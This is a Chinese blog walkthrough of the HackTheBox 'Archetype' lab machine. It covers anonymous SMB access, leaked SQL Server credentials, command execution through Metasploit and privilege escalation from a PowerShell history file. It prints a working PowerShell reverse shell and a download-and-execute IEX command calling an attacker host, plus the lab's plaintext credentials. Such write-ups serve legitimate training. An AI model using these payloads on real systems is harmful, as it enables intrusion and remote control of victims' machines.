HackTheBox-StartingPoint-Archetype WP

最新推荐文章于 2025-06-06 17:39:26 发布
最新推荐文章于 2025-06-06 17:39:26 发布
阅读量205 收藏
点赞数
分类专栏: HackTheBox 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/a709046532/article/details/120248123
版权

吐槽下VPN,太不稳定了。。

但没交钱嘛,俺无话可说




0x01 信息收集

nmap -sC -sV -v 10.10.10.27

-sC:使用默认脚本进行扫描,等同于–script=default
-sV:探测开启的端口来获取服务、版本信息

-v:vpn不稳定,开了看扫描是不是挂掉了

典型的windows配置,没有WEB站点:

image-20210912102057170




0x02 user.txt

445端口的话可以尝试SMB爆破、匿名访问等,winserver版本那么高就不可能有永恒之蓝啦。

这里最后试出来是匿名访问,使用如下命令访问共享资源列表:

smbclient -N -L //10.10.10.27/

image-20210912102317995



-N参数去掉即可访问对应的共享资源,然后使用dir命令即可看到共享的文件。

image-20210912102501965


这里是有一个prod.dtsConfig,使用get命令可以下载下来:

image-20210912102652986



可以拿到泄露的账户密码。Google一下能够发现是SQLSERVER的配置信息:

image-20210912102843077



于是我们可以使用metasploit的mssql_exec模块执行命令:

msf6 auxiliary(admin/mssql/mssql_exec) > set rhosts 10.10.10.27
rhosts => 10.10.10.27
msf6 auxiliary(admin/mssql/mssql_exec) > set username sql_svc
username => sql_svc
msf6 auxiliary(admin/mssql/mssql_exec) > set password M3g4c0rp123
password => M3g4c0rp123
msf6 auxiliary(admin/mssql/mssql_exec) > set domain ARCHETYPE
domain => ARCHETYPE
msf6 auxiliary(admin/mssql/mssql_exec) > set use_windows_authent true
use_windows_authent => true
msf6 auxiliary(admin/mssql/mssql_exec) > set cmd whoami
cmd => whoami

image-20210912103145978



结果是肥肠不戳的,我们可以进一步把shell拿回来。

这里直接使用msf的web_delivery模块是会被杀软拦截的,因为没有免杀(Very Easy等级的Box 上杀软真的不大丈夫嗷)。。

这里就用了官方WP提供的免杀Script:

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.98",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

将其保存成reverse_shell.ps1


接下来开启80端口的HTTPSERVER,然后在443上NC监听:

image-20210912103639411



在msf上重新设置要执行的命令,注意转义。

set cmd PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile  IEX (New-Object Net.WebClient).DownloadString(\\\"http://10.10.14.98/reverse_shell.ps1\\\");

拿到shell之后一路dir下去。能够在用户的桌面找到user.txt

type c:\\Users\\sql_svc\\Desktop\\user.txt

image-20210912104054373




0x03 root.txt

root的提权是利用了命令执行历史记录的泄露。一番查找后找到目录C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

能够找到泄露的管理员凭据信息:

image-20210912104621969



直接使用msf的psexec模块即可拿到靶机的meterpreter:

   Name                  Current Setting   Required  
   ----                  ---------------   --------  
   RHOSTS                10.10.10.27       yes       
   RPORT                 445               yes      
   SERVICE_DESCRIPTION                     no        
   SERVICE_DISPLAY_NAME                    no        
   SERVICE_NAME                            no        
   SMBDomain             .                 no        
   SMBPass               MEGACORP_4dm1n!!  no        
   SMBSHARE                                no        
   SMBUser               administrator     no        


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  
   ----      ---------------  -------- 
   EXITFUNC  thread           yes   
   LHOST     10.10.14.98      yes      
   LPORT     4444             yes

image-20210912105037407



在管理员的桌面目录下即可拿到root的flag:

image-20210912105314444


Metasploit-MSSQL渗透-实战篇
eT48_Sec
12-24 1万+
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证和渗透测试。而Metasploit是Kali Linux中的一款开源安全漏洞检测工具。 打开metasploit的控制台终端: 先使用NMAP对目标进行端口扫描,目标的IP地址已经打码,不对外公开。 从扫描结果中,我们得知目标对外开放了1433端口对应于ms
Hack The Box - STARTING POINT
小小郭的博客
03-06 2636
Hack The Box - STARTING POINT
mysql exec_MySQL 实现调用外部程序和系统命令
weixin_32019329的博客
01-18 550
MySQL 实现调用外部程序和系统命令Refer:http://www.cnblogs.com/yunsicai/p/4080864.html1) Download lib_mysqludf_sys $ git clone https://github.com/mysqludf/lib_mysqludf_sys.git2) get mysql plugin dir as LIBDIR:mys...
msf中mssql扫描以及漏洞利用模块
weixin_33725270的博客
10-24 1436
auxiliary/admin/mssql/mssql_enum       normal     Microsoft SQL Server Configuration Enumeratorauxiliary/admin/mssql/mssql_enum_domain_accounts     normal     Microsoft SQL Server SUSER_SNAME Windows ...
MSSQL渗透备忘录
qq_40710190的博客
07-07 1094
MSSQL
mssql:sp_executesql与exec(@sql)
conganguo的专栏
08-02 2763
sp_executesql 位于master库下的一个扩展存储过程。用于执行一段sql代码。 例子: declare @count int,@tableNamenvarchar(50),@SQLString nvarchar(max),@proid int,@idint,@ParmDefinition nvarchar(max); set @tableName='table27';
Metasploit用法大全
weixin_30807779的博客
01-24 875
Metasploit用户接口msfconsoleArmitage: KaliGUI启动;armitage命令启动 Metasploit功能程序msfvenom集成了载荷生成器、载荷编码器、空指令生成器的功能查看详细指令选项:msfvenom-h 服务器消息块协议扫描msf>useauxiliary/scanner/smb/smb_version 搜寻配置不当的Microso...
mysql 实现 mssql exec 动态查询语句
热门推荐
moshuchao的专栏
03-06 1万+
以下文章转自:http://borland.mblogger.cn/shuixin13/posts/25911.aspx从MySQL 5.0 开始,支持了一个全新的SQL句法:PREPARE stmt_name FROM preparable_stmt;EXECUTE stmt_name [USING @var_name [, @var_name] ...];{DEALLOCATE | D
exec sql mysql_Mysql实现Mssql Server功能的exec的方法
weixin_33474071的博客
02-07 322
第一步:建立一个Mysql存储过程,必须要注意的地方是:一定要使用 DELIMITER(定界符这个)关键字,否则会产生ErrorNum:1064。这点无论是使用命令行还是Mysql Tools(Workbench)都必须遵守。具体参考:http://dev.mysql.com/doc/refman/5.1/en/stored-programs-defining.html ,又一次证明了,仔细阅读文...
安全】VulnHub靶场 - W1R3S
风舞雪凌月的博客
06-02 672
本文记录了对W1R3S.inc服务器的渗透测试过程。通过扫描发现靶机开放21(FTP)、22(SSH)、80(HTTP)、3306(MySQL)端口,其中FTP存在匿名登录漏洞,获取到包含潜在密码线索的文档。Web服务发现Apache默认页面及Cuppa CMS安装界面,同时存在WordPress目录但访问受限。测试人员尝试了SSH和MySQL的弱口令爆破未果,后续将重点利用FTP获取的信息和Web应用漏洞进行深入渗透,最终目标是获取root权限并找到/root目录下的flag。测试过程展示了从信息收集到漏
当 “欧洲版 Cursor” 遇上安全危机
2401_86652632的博客
06-03 566
今年 3 月 20 日,Palmer 发现 Lovable 创建的 Linkable 网站存在漏洞,只需修改查询参数,就能获取项目 “用户” 表中的所有数据,他甚至因此看到了约 500 名该应用用户的电子邮件地址。漏洞报告显示,这项安全扫描仅仅是确定 Supabase 数据库是否启用访问控制,而对于控制选项是否正确配置这一关键问题,却选择了回避,导致网站依然面临数据操纵和注入等严重安全问题,充分暴露出 Lovable 生态系统中系统性的 RLS 实施缺陷。在追求便捷开发的同时,安全绝不能被忽视。
加密货币钱包开发指南:多链资产管理与非托管安全范式
Lovely_xwys的博客
06-06 821
后端:Rust(高性能核心模块) + Go(跨链通信层);前端:React Native(跨平台兼容) + Web3.js(区块链交互);区块链适配:以太坊Solidity、Solana Anchor框架。
本地部署企业邮箱,让企业办公更安全高效
U-Mail邮件服务器软件
06-06 148
基于安全性、个性化需求、系统集成等方面的考量,越来越多的企业倾向于选择本地部署企业邮箱,本地化部署不仅能够有效守护企业信息安全,还能依据企业未来发展的需求,灵活调整企业邮箱系统的功能,甚至进行二次开发,同时实现与其他办公系统的无缝集成,为企业数字化办公提供坚实支撑。企业邮箱系统运行在稳定的环境中,访问速度更快,系统运行更可靠,能够有效避免因网络问题导致的邮件服务中断。本地部署的企业邮箱可以与企业现有的OA系统、CRM、ERP等办公系统无缝对接,形成统一的数字化办公平台。
第二章 2.3 数据存储安全风险之数据存储风险防范
weixin_43172311的博客
06-04 1077
大家好,今天我想和大家聊聊一个既专业又与我们生活息息相关的话题——数据安全风险防控。无论你是普通用户还是技术从业者,了解这些内容都能帮助你在数字世界中更好地保护自己和他人。
装载机防撞系统:智能守护,筑牢作业现场人员安全防线
最新发布
wtsafe的博客
06-06 214
《装载机智能防撞系统重塑工地安全生态》摘要:传统建筑工地中,装载机作业面临视野盲区、复杂地形和粉尘干扰等多重安全隐患。唯创安全推出的智能防撞系统通过AI和UWB技术实现精准防护:AI系统主动探测周边移动目标并动态预警,UWB系统通过测距标签实现三级区域精确防护(精度达10厘米),结合自动限速和停车功能,从根本上杜绝碰撞事故。这种从被动防护到智能预警的转变,显著提升了工地安全水平,推动传统工地向"智慧安全工地"转型。(149字)
【Java后端基础 005】ThreadLocal-线程数据共享和安全
金哥的博客
06-06 473
ThreadLocal常用方法,经典应用场景,以及解析
Neo4j 安全深度解析:原理、技术与最佳实践
weixin_30777913的博客
06-04 569
其有效性依赖于对纵深防御策略的严格执行与持续维护。通过深入理解其安全模型,严格遵循最佳实践,并保持警惕性监控,可以显著提升图数据资产的安全性,为关键业务应用构建坚实可信的基础。定期查阅官方安全文档是保持配置符合最新安全标准的关键。在当今数据驱动的世界中,图数据库承载着关键的关系信息,其安全性至关重要。Neo4j 提供了一套多层次、纵深防御的安全体系。Neo4j 的安全体系提供了从认证授权到数据加密、审计追溯的完整解决方案。
Docker MCP 目录和工具包简介:使用 MCP 为 AI 代理提供支持的简单安全方法
Willin Wang 的全栈升级指南
06-05 991
Docker推出MCP Catalog和Toolkit测试版,旨在简化AI代理开发中模型上下文协议(MCP)工具的使用。该解决方案解决了MCP工具面临的三大挑战:发现难、安装复杂和安全隐患。MCP Catalog提供100多个精选容器化MCP服务器,而Toolkit则简化了安装、凭证管理和访问控制。通过与Stripe、Elastic等知名企业合作,Docker为开发者提供了安全、可扩展的MCP生态系统,支持与主流MCP客户端一键连接。未来还将扩展企业级功能,使团队能在Docker Hub上构建和共享MCP工
AWS App Mesh实战:构建可观测、安全的微服务通信解决方案
awscloud的博客
06-03 1119
本文详解如何利用AWS App Mesh统一管理微服务间通信,实现精细化流量控制、端到端可观测性与安全通信,提升云原生应用稳定性。
使用gradle-archetype-plugin自定义项目模板快速生成
给出的名称是 `gradle-archetype-plugin-master`,它表明这是关于 `gradle-archetype-plugin` 插件的源代码压缩包,并且版本是主版本(master),通常含有最新开发进度的代码。 ### 总结 通过上述分析,我们可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

h1nt

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值